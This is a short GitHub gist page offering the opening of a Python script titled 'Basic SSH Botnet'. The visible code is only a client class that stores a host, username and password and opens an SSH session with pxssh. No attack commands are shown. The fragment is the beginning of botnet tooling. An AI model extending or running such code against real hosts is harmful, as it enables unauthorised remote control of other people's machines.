Skip to content

Instantly share code, notes, and snippets.

@Belgium
Belgium / pysshbotnet.py
Created February 10, 2015 12:56
[Python] Basic SSH Botnet
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()